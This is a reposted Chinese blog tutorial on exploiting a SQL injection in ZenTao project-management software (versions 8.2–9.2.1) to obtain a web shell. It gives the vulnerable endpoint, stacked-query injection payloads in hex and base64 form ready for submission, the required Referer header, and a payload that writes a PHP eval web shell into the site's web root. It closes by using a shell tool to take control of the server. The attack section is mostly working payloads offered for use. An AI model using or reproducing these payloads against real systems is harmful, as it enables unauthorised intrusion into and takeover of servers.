禪道8.2-9.2.1注入GetShell

· ?漏洞分析

附上某老哥的漏洞分析，來了解下原理。

· ? 漏洞利用

查看版本：

訪問Url：http://127.0.0.1/zentao/index.php?mode=getconfig即可獲取禪道的版本號以及一些其他的信息，目前漏洞存在于v8.2~v9.2

確定版本號之后，我們就可以嘗試GetShell利用漏洞，根據另一個老哥博客提供的***方法獲取站點路徑然后注入一句話***，但我試了一下，獲取的并不是完整的路徑，而是模塊路徑的報錯，后來換了一種思路，有興趣的朋友可以看下哪位老哥的漏洞利用

查看密碼忘記文本路徑：

訪問Url：http://127.0.0.1/zentao/user-reset.html

寫入忘記密碼的文本：

shell語句命令：

select?''?into?outfile?/opt/zbox/app/zentao/tmp/reset_5c7e631454ae5.txt'

HEX編碼：（注意加密解密都不帶0x，但是EXP中需要加上）

73656c65637420272720696e746f206f757466696c65202f6f70742f7a626f782f6170702f7a656e74616f2f746d702f72657365745f356337653633313435346165352e74787427

注入文件語句：

{"orderBy":"order?limit?1;SET?@SQL=0x73656c65637420272720696e746f206f757466696c65202f6f70742f7a626f782f6170702f7a656e74616f2f746d702f72657365745f356337653633313435346165352e74787427;PREPARE?pord?FROM?@SQL;EXECUTE?pord;--?-","num":"1,1","type":"openedbyme"}

base64加密：

eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDIwMjcyNzIwNjk2ZTc0NmYyMDZmNzU3NDY2Njk2YzY1MjAyZjZmNzA3NDJmN2E2MjZmNzgyZjYxNzA3MDJmN2E2NTZlNzQ2MTZmMmY3NDZkNzAyZjcyNjU3MzY1NzQ1ZjM1NjMzNzY1MzYzMzMxMzQzNTM0NjE2NTM1MmU3NDc4NzQyNztQUkVQQVJFIHBvcmQgRlJPTSBAU1FMO0VYRUNVVEUgcG9yZDstLSAtIiwibnVtIjoiMSwxIiwidHlwZSI6Im9wZW5lZGJ5bWUifQ==

使用火狐的HackBar插件工具進行注入：

提交地址：
http://127.0.0.1:81/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=base64

※exp需要base64加密后才能提交，且回顯、寫Shell須加上Referer：http://127.0.0.1/zentao/

我們通過注入剛才的文本文件后，進入后臺->備份獲取禪道的安裝位置，這里顯示的是 /opt/zbox/app/zentao/tmp/backup/201903060030545.sql.php，那么站點的目錄的位置就是 /opt/zbox/app/zentao/www，然后通過上面的方式再注入一句話***

shell語句命令：

select?'<?php?@eval($_POST[123456])?>'?into?outfile?'/opt/zbox/app/zentao/www/hack.php'

HEX編碼：

73656c65637420273c3f70687020406576616c28245f504f53545b3132333435365d293f3e2720696e746f206f757466696c6520272f6f70742f7a626f782f6170702f7a656e74616f2f7777772f6861636b2e70687027

注入文件語句：

{"orderBy":"order?limit?1;SET?@SQL=0x73656c65637420273c3f70687020406576616c28245f504f53545b3132333435365d293f3e2720696e746f206f757466696c6520272f6f70742f7a626f782f6170702f7a656e74616f2f7777772f6861636b2e70687027;PREPARE?pord?FROM?@SQL;EXECUTE?pord;--?-","num":"1,1","type":"openedbyme"}

base64加密：

eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDIwMjczYzNmNzA2ODcwMjA0MDY1NzY2MTZjMjgyNDVmNTA0ZjUzNTQ1YjMxMzIzMzM0MzUzNjVkMjkzZjNlMjcyMDY5NmU3NDZmMjA2Zjc1NzQ2NjY5NmM2NTIwMjcyZjZmNzA3NDJmN2E2MjZmNzgyZjYxNzA3MDJmN2E2NTZlNzQ2MTZmMmY3Nzc3NzcyZjY4NjE2MzZiMmU3MDY4NzAyNztQUkVQQVJFIHBvcmQgRlJPTSBAU1FMO0VYRUNVVEUgcG9yZDstLSAtIiwibnVtIjoiMSwxIiwidHlwZSI6Im9wZW5lZGJ5bWUifQ==

注入之后我們就可以通過GetShell工具進行服務器的控制連接

轉載于:https://blog.51cto.com/13444271/2358833

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/449243.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/449243.shtml
英文地址，請注明出處：http://en.pswp.cn/news/449243.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！